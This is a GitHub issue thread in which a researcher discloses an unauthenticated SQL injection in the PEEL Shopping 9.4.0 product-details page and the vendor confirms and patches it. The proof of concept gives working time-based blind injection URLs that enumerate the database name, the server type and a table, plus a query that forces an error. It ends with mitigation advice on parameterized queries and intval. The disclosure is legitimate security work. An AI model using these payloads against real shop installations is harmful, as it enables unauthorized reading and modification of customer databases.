Closed faisalfs10x closed 3 years ago
This was due to a change of structure to get product details, in order to potentially link it to a product API instead of reading data from MySQL. The previously done protection was no more active, thus it was necessary to add an intval on the GET parameter.
=> Subject closed
So, i noticed you made code changes on this line right. file _produitdetails.php . But, the bug is still affected on version 9.3.0 anyway.
The version which can be downloaded on our website is now patched
That's great. Thanks for acknowledge the vulnerability.
Thanks for your remarks.
Vulnerability Name: SQL Injection in "_produitdetails.php?id" parameter
Date of Discovery: 10 July 2021
Product version: 9.4.0 . Download link
Author: faisalfs10x
Vulnerability Description: Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "_/peel-shopping_9_4_0/achat/produitdetails.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
Vulnerable URL: _http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]_
Proof of Concept:
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
[PoC enum db name]
2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
[Poc enum MariaDB]
3) By default, the database have a table name = peel_produits. This query will check if table_name _peelproduits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
[PoC enum table peel_produits]
To produce SQL syntax error, it is possible to intercept the request before it is redirect to homepage using a tool like BurpSuite (repeater).
Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)
[MariaDB disclosed image]
[peel_produits table_name disclosed]
Dump table name = peel_profil
Mitigation: Use of Prepared Statements (with Parameterized Queries). It would be good also to casting integer to ensure only numerical data is inserted in 'id' parameter eg - intval($_GET['id']) cc @advisto
References for Mitigation Vulnerability: